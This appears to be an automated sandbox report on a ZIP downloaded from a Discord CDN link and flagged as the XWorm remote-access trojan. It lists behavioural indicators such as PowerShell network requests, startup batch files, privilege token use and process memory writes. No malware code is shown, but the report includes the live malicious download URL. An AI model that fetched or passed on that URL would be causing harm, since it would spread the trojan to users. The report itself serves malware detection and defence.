Malware Analysis Report

2024-11-16 13:37

Sample ID 240529-ymbwmsgf39
Target https://cdn.discordapp.com/attachments/1236808584256553051/1236809096150126664/Classic_Tag.zip?ex=665856fb&is=6657057b&hm=bb2a195faf9085e5d2688dd8ac6b505ccca9e3f2996736a1d3c2441a2c0d31df&
Tags
xworm execution rat trojan
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

Threat Level: Known bad

The file https://cdn.discordapp.com/attachments/1236808584256553051/1236809096150126664/Classic_Tag.zip?ex=665856fb&is=6657057b&hm=bb2a195faf9085e5d2688dd8ac6b505ccca9e3f2996736a1d3c2441a2c0d31df& was found to be: Known bad.

Malicious Activity Summary

xworm execution rat trojan

Detect Xworm Payload

Xworm

Blocklisted process makes network request

Command and Scripting Interpreter: PowerShell

Enumerates physical storage devices

NTFS ADS

Suspicious use of WriteProcessMemory

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary

Suspicious use of AdjustPrivilegeToken

Suspicious use of FindShellTrayWindow

Suspicious use of SendNotifyMessage

Opens file in notepad (likely ransom note)

Enumerates system info in registry

Suspicious behavior: EnumeratesProcesses

Modifies registry class

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-05-29 19:53

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-05-29 19:53

Reported

2024-05-29 19:55

Platform

win11-20240508-en

Max time kernel

90s

Max time network

93s

Command Line

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://cdn.discordapp.com/attachments/1236808584256553051/1236809096150126664/Classic_Tag.zip?ex=665856fb&is=6657057b&hm=bb2a195faf9085e5d2688dd8ac6b505ccca9e3f2996736a1d3c2441a2c0d31df&

Signatures

Detect Xworm Payload

Description Indicator Process Target
N/A N/A N/A N/A

Xworm

trojan rat xworm

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Enumerates physical storage devices

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-2457560273-69882387-977367775-1000_Classes\Local Settings C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2457560273-69882387-977367775-1000_Classes\Local Settings C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2457560273-69882387-977367775-1000_Classes\Local Settings C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2457560273-69882387-977367775-1000_Classes\Local Settings C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-2457560273-69882387-977367775-1000\{CF5ABFFC-0817-4064-9FB6-89A0BEFED940} C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

NTFS ADS

Description Indicator Process Target
File opened for modification C:\Users\Admin\Downloads\Classic_Tag.zip:Zone.Identifier C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File created C:\Users\Admin\AppData\Roaming\startup_str_714.bat\:Zone.Identifier:$DATA C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File created C:\Users\Admin\AppData\Roaming\startup_str_242.bat\:Zone.Identifier:$DATA C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File created C:\Users\Admin\AppData\Roaming\startup_str_690.bat\:Zone.Identifier:$DATA C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Opens file in notepad (likely ransom note)

ransomware
Description Indicator Process Target
N/A N/A C:\Windows\system32\NOTEPAD.EXE N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 33 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 34 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 35 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 36 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 33 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 34 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 35 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 36 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 33 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 34 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 35 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2456 wrote to memory of 1232 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2456 wrote to memory of 1232 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2456 wrote to memory of 5096 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2456 wrote to memory of 5096 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2456 wrote to memory of 5096 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2456 wrote to memory of 5096 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2456 wrote to memory of 5096 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2456 wrote to memory of 5096 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2456 wrote to memory of 5096 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2456 wrote to memory of 5096 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2456 wrote to memory of 5096 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2456 wrote to memory of 5096 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2456 wrote to memory of 5096 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2456 wrote to memory of 5096 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2456 wrote to memory of 5096 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2456 wrote to memory of 5096 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2456 wrote to memory of 5096 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2456 wrote to memory of 5096 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2456 wrote to memory of 5096 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2456 wrote to memory of 5096 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2456 wrote to memory of 5096 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2456 wrote to memory of 5096 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2456 wrote to memory of 5096 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2456 wrote to memory of 5096 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2456 wrote to memory of 5096 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2456 wrote to memory of 5096 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2456 wrote to memory of 5096 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2456 wrote to memory of 5096 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2456 wrote to memory of 5096 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2456 wrote to memory of 5096 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2456 wrote to memory of 5096 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2456 wrote to memory of 5096 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2456 wrote to memory of 5096 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2456 wrote to memory of 5096 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2456 wrote to memory of 5096 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2456 wrote to memory of 5096 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2456 wrote to memory of 5096 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2456 wrote to memory of 5096 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2456 wrote to memory of 5096 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2456 wrote to memory of 5096 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2456 wrote to memory of 5096 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2456 wrote to memory of 5096 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2456 wrote to memory of 3372 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2456 wrote to memory of 3372 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2456 wrote to memory of 5004 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2456 wrote to memory of 5004 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2456 wrote to memory of 5004 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2456 wrote to memory of 5004 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2456 wrote to memory of 5004 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2456 wrote to memory of 5004 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2456 wrote to memory of 5004 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2456 wrote to memory of 5004 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2456 wrote to memory of 5004 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2456 wrote to memory of 5004 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2456 wrote to memory of 5004 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2456 wrote to memory of 5004 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2456 wrote to memory of 5004 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2456 wrote to memory of 5004 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2456 wrote to memory of 5004 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2456 wrote to memory of 5004 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2456 wrote to memory of 5004 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2456 wrote to memory of 5004 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2456 wrote to memory of 5004 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2456 wrote to memory of 5004 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Processes

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://cdn.discordapp.com/attachments/1236808584256553051/1236809096150126664/Classic_Tag.zip?ex=665856fb&is=6657057b&hm=bb2a195faf9085e5d2688dd8ac6b505ccca9e3f2996736a1d3c2441a2c0d31df&

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff808393cb8,0x7ff808393cc8,0x7ff808393cd8

